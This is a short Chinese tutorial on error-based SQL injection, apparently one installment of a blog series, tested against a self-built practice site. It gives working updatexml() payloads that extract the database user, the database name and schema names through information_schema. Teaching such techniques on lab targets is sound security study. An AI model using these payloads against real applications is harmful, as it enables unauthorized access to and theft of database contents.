0x0同理搭建环境很简单,编写好代码,扔到phpstudy下的跟目录。
测试代码:
0x1进行靶场测试
老套路输入单引号:
可以看出这里存在注入点。
使用函数updatexml()获取user()的值:
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
0x7e是ASCII编码,解码下是~
测试效果:
在尝试获得数据库名
' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
测试效果:
下面获取表名、字段内容,查询语句跟union注入相同,使用limit语句。
' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+
同理通过改变limit 数字获得test数据库名,同理获取数据库test下的表名:
通过单引号报错,我们可以利用floor(),updatexml()等函数进行查询数据库相关信息。
下节关注时间注入。